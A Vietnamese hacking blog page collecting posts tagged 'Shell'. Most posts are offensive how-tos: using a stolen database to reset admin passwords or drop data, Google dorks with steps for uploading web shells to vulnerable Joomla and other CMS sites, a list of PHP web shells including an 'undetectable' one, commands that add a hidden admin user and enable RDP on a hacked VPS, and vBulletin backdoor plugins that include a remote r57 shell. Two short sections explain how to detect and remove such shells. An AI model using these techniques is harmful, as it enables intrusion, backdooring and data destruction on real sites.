Trang

Hiển thị các bài đăng có nhãn Shell. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Shell. Hiển thị tất cả bài đăng

Up Shell khi đã có user pass database

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao

+ có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao
Đặt ra nhiều trường hợp ( biết vận động cái đầu chút )
nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và pass ( điều nầy thì ko cần nói nhiều)
Nhưng nó dùng cpanel thì sao , cái này mới khốn ( trường hợp không có shell nhé)
_ Giải pháp cho mấy bé đây
+ xác định ip và tìm sẵn link admin ( nếu là vbb khi khỏi có cách upload shell qua data)
+ Máy cài visual 2010 hay bản bao nhiêu thì tùy
+http://dev.mysql.com/downloads/connector/net/1.0.html download bản này về import vào C# , để khai báo thư viện MySql
+ Việc đơn giản còn lại là kết nối với data mà ta đã vô tình hoặc trộm cắp ở đâu thì tùy với câu lệnh kết nối vào Mysql như sau
================================

String connString = "Server = IP host đã xác định bước trên ; Database = data đã trôm được;Port = 3306 ( cổng kết nối của Mysql); User ID = User Mysql;Password";
MySqlConnection conn = new MySqlConnection(connString);
MySqlCommand Command();
Conman = conn.CreateCommand();
Command.CommandText = "Câu Lệnh SQL"; //

ví dụ như
UPDATE `user` SET "password" = "69e53e5ab9536e55d31ff533aefc4fbe'", salt = "p5T" WHERE `userid` = "1"

còn chơi khăm hơn thì

DROP DATABASE `tên data`;

và Nhấn F5 xem thành quả thâu :v

thực chất ra đây cũng chỉ là 1 chút tư duy trong hacking thôi .....Quan trọng là biết cách suy nghĩ

còn đây là video UpShell qua database

Sẽ ra mắt tools connect Mysql và Auto UpLoad Shell for VBB

_ 1 vài video tìm lại
_Video Bypass Chatbox WorldOfHacked =))
http://www.mediafire.com/download/88olep119kiqy1o/bypasschatbox.rar
+ Hack Tiền quán nét
http://www.mediafire.com/download/qglc9r4jt5cnl1u/tmt_cheattime.rar
Ưu điểm có thể gian lận đc nếu biết cách
Nhược điểm : chủ quán biết là chỉ có ăn dép thẳng vào mồm
_Hack Shop Auto V5
http://www.mediafire.com/download/drhi5o3nsc9tblt/hackshop.rar
Chỉ là dùng 1 đoạn java nhỏ để Get Table và colums
_Upload Shell PhpMyadmin
http://www.mediafire.com/download/463c3r7k33f1vzx/upshell.rar
_Local Id Apache
http://www.mediafire.com/download/dtu9zb8u6zkf9gy/local_apache.rar
_Và mấy thằng bợn nhợn chúng nó khai thác web DAV như thế nào
http://www.mediafire.com/download/4b1a1d45o7pk7kw/exploit_server_win_DAV.rar
_Test Local Attack qua FXPFlash
http://www.mediafire.com/download/h3lmylp39so4w95/bypassflasfxp.rar

Xem Thêm

 

Ck_PyShell

Tool Name: Ck_pyShell

1

Version: 1.1
Release: Beta
Description:
A Multipurpose Tool For Pen-Testing Coded With Python. Uses Various User Agents To Fuzz The Requesting URL for All Purpose. Can Detect Proxy Settings and connect via Proxy Automatically If Any Found! Version 1.1 Has Added Features, Supports Tab Completion Of Commands and More Utilities Programmed.

'color' command has been removed as it does not work with Windows OS Properly

COMPATIBILITY:
Any Windows OS

FEATURES:

1. SQL Injection Vulnerability Scanner
2. XSS Vulnerability Scanner
3. Hash Making and Cracking
4. Admin Login Page Finder
5. Port Scanner
6. LAN DoS Attacker
7. Ping Utility
8. FTP Login Bruteforce
9. Network Scanner For Live Hosts
10. TCP/UDP Flooder
11. BlindSQL Injector [This is Still Being Coded, This Release Can get the Tables And Columns And Database Version]

USAGE:

For "Help" Type Help From The Main Prompt

Download Link: Click Here

Xem Thêm

 

Joomla Shell Upload Vulnerability

requirements:
1.mind
use this google dork to find vulnerable joomla sites ## 
google dork : inurl:index.php?option=com_fabrik


after open the sites replace with this address ##

index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1
for example ##
"www.xyz.com/index.php" to "www.xyz.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1"


after that if you see uploder then congratulations....
upload your shell.

shell path will be ##
www.xyz.com/media/shell_name.php


Xem Thêm

 

TOP 5 PHP Shells of 2012

1- b374km1n1 Modified by Newbie3viLc063s v.2012
mostly hackers used b374k shell for defacing and other works, here is latest version of  b374k m1n1, re coded by Newbie3viLc063 hackers.

New fuctions in this shell :
b374k+m1n1
  • OpenDIR 
  • Symlink
  • SQLI Scan 
  • Website Whois 
  • Port-Scanner 
  • WP Reset 
  • Jomlaa Reset 
  • CMS Scanner 
  • VB Changer 
  • String Encoder 
  • SQL Backup 
  • WHMCS Decoder 
  • Security Mode
  •  Process
2- Sym 2.0 (auto symlink shell)
Manual Symlink takes a lot of time in finding platform of website and Configuration files, so we use sym 2.0 for auto symlink, 
in this shell you can check website's url and thier Configuration by single click
Download  

3- WSO shell
.com/ 
wso is one of the Most Pouplar shelles used by hackers, this shell having Good Interface and fuctions 
Download 

4- 404 Not found Shell 

404 shell is a Modified version of wso shell, sometimes after upload your shell some guys find it using scanners and they use your shells, and shells also can be find with google dorks,so we use this undetectable and password protected shell, its will show to a 404 page if someone else will acess it, to login in this shell press tab. 

5-Madspot Shell
.com/ 
Madshpot shell is coded by MadSpot Security Team, Madspot shell's interface is also Good, and having Latest Features too.
Download

Xem Thêm

 

Mannu shell version 2 by Indishell

Mannu shell version 2 with some new features and modified interface look
Download link:
--==[[ http://www.mediafire.com/download.php?a72ttl7vtq1ldvs ]]==--
by default username: team
password: indishell

new Features in the shell are
1.File uploader
2.vbulletin admin password changer
3.Joomla admin panel username/password changer
4.Wordpress admin panel username/password changer
5.Password protected
in joomla/wordpress admin username/password changer you need not to supply md5 hashed password
just provide database name,database user,database password ,new username and password that you want to set...

Xem Thêm

 

XSS Shell

Xem Thêm

 

WebShell remote Configuration excution

webShell 4.O remote Configuration excution
             WebShell remote Configuration excution | Juno_okyo's Blog
Dorks : ext:php intitle:webSPELL v4.0
            "inurl:/picture.php?file="
Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php
you'll get a Blanck Page 
press ctrl+U and view source 
you'll find something like this 
Now connect to database and do whatever you want
Live demo : 

Xem Thêm

 

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"

Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 

Xem Thêm

 

Exidous CMD Shell

Connect to shell
Exidous CMD Shell | Juno_okyo's Blog


Connected
Exidous CMD Shell | Juno_okyo's Blog

XSA Tool
Exidous CMD Shell | Juno_okyo's Blog

Getting Username
Exidous CMD Shell | Juno_okyo's Blog

Going to that directory
Exidous CMD Shell | Juno_okyo's Blog

Dir Listing
Exidous CMD Shell | Juno_okyo's Blog
Just For Fun (/etc/passwd)

Download


Xem Thêm

 

[TUT] Up Shell bằng tamper data

bạn cần cài tamper data tại đây
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Xem Thêm

 

[TUT] Hack VPS từ Shell !

đầu tiên execute command trên con shell đó >
net user l33t p4$sword /add 

l33t=username p4$sword=password
Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Code:
net localgroup administrators l33t /add
 Sau đó thực hiện kết nối tới VPS
Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:


Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

Xem Thêm

 

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.
Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để.
Tôi xin nói thêm trong vbb những table có thể lợi dụng để include shell vào là table_template và table_plugin.
Vậy làm thế nào để phát hiện shell khi đã được include vào 2 table này nhỉ?Cách làm như sau:
- Bạn vào Phpadmin của host và search từ khóa

Code:
base64
Và làm theo hướng dẫn như hình sau:
Tại sao ta phải search từ khóa base64 mà không phải là từ khóa khác ?
Xin thưa rằng tất cả các con shell hiện nay nếu không được mã hóa thì sẽ bị antivirut tiêu diệt trừ khi đổi tên file thành file.txt
- Việc còn lại của bạn là mở table khả nghi ra và kiểm tra xem có gì đặc biệt khác thường trong đó không.
Chú ý:
- Đối với table plugin thì bạn có thể delete đi mà không ảnh hưởng gì đến việc hoạt động site.
- Đối với table template nếu bạn thích thì cũng có thể delete còn muốn dùng lại skin đó thì hãy vào admincp rồi nhấn vào revert để vbb tự động edit lại skin cho bạn.
- Bạn có thể áp dụng cách này với những code khác như wordpress, joomla, new, shop, etc…

Xem Thêm

 

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker – upload shell
Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo. 
Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)
Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:
{ 
if($_GET['nameshell']=="heloworld"){ 
include('http://localhost/r57new.php'); 
} 
}
Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .
Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé
Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
Demo: mình edit file announcement.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
    'postbit',
    'reputationlevel',
    'posting',
Hưởng thụ thành quả lao động nào
Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)
Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp / subscriptions.php làm theo tương tự với những file khác
demo here:
Method 4: import shell qua skin
Bạn lần lượt làm như sau:
Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)
Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.
Và đây là kết quả
Cũng cool đó nhỉ ^^!
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
- Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
- Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
- Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào
+ Method 4: remove skin bị đính kèm shell
Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx …

Xem Thêm

 

Hidden Baby cho vBulletin (all version)

Screenshot:


http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương